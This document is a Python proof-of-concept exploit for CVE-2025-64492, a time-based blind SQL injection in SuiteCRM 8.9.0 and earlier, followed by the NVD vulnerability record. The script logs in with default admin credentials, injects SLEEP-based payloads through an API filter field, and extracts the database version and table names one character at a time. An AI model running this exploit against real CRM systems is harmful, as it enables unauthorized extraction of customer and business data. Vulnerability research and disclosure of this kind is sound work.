CVE-2025-64492

import time import requests # CVE-2025-64492 Time-Based Blind SQL Injection PoC # Target: SuiteCRM <= 8.9.0 # Author: Security Researcher TARGET_URL = "http://target-suitecrm.com" LOGIN_URL = f"{TARGET_URL}/api/oauth/access-token" TARGET_ENDPOINT = f"{TARGET_URL}/api/v8/some-endpoint" USERNAME = "admin" PASSWORD = "admin" def login(): """Authenticate and get access token""" data = { "grant_type": "password", "client_id": "suitecrm", "client_secret": "", "username": USERNAME, "password": PASSWORD } response = requests.post(LOGIN_URL, json=data) if response.status_code == 200: return response.json().get("access_token") return None def inject_sql_payload(token, payload): """Send SQL injection payload and measure response time""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } data = { "filter": [ { "field": f"test' AND (SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END) AND '1'='1", "operator": "equals", "value": "1" } ] } start_time = time.time() response = requests.post(TARGET_ENDPOINT, json=data, headers=headers, timeout=30) elapsed_time = time.time() - start_time return elapsed_time def extract_db_version(token): """Extract database version using time-based blind SQLi""" payload = "(SELECT SUBSTRING(@@version,1,1)='5')" # MySQL 5.x elapsed = inject_sql_payload(token, payload) return elapsed > 5 def extract_table_names(token): """Enumerate table names from database""" tables = [] for i in range(1, 50): payload = f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database() AND SUBSTRING(table_name,{i},1)='a')" if inject_sql_payload(token, payload) > 5: # Extract character by character table_name = "" for j in range(1, 50): for char in range(32, 127): payload = f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database() AND SUBSTRING(table_name,{j},1)=CHAR({char}))" if inject_sql_payload(token, payload) > 5: table_name += chr(char) break tables.append(table_name) break return tables def main(): print("[*] CVE-2025-64492 - SuiteCRM Time-Based Blind SQL Injection") print("[*] Authenticating to SuiteCRM...") token = login() if not token: print("[-] Authentication failed") return print("[+] Authentication successful") print("[*] Testing SQL injection...") if extract_db_version(token): print("[+] Database version extraction successful") tables = extract_table_names(token) print(f"[+] Found tables: {tables}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64492", "sourceIdentifier": "[email protected]", "published": "2025-11-08T02:15:34.693", "lastModified": "2025-11-25T17:33:24.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 8.9.0 and below contain a time-based blind SQL Injection vulnerability. This vulnerability allows an authenticated attacker to infer data from the database by measuring response times, potentially leading to the extraction of sensitive information. It is possible for an attacker to enumerate database, table, and column names, extract sensitive data, or escalate privileges. This is fixed in version 8.9.1."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Las versiones 8.9.0 e inferiores contienen una vulnerabilidad de inyección SQL ciega basada en tiempo. Esta vulnerabilidad permite a un atacante autenticado inferir datos de la base de datos midiendo los tiempos de respuesta, lo que podría llevar a la extracción de información sensible. Es posible para un atacante enumerar nombres de bases de datos, tablas y columnas, extraer datos sensibles o escalar privilegios. Esto está corregido en la versión 8.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.1", "matchCriteriaId": "5DFDEB5D-4821-41F8-AEBB-38D394739DDE"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-54m4-4p54-j8hp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}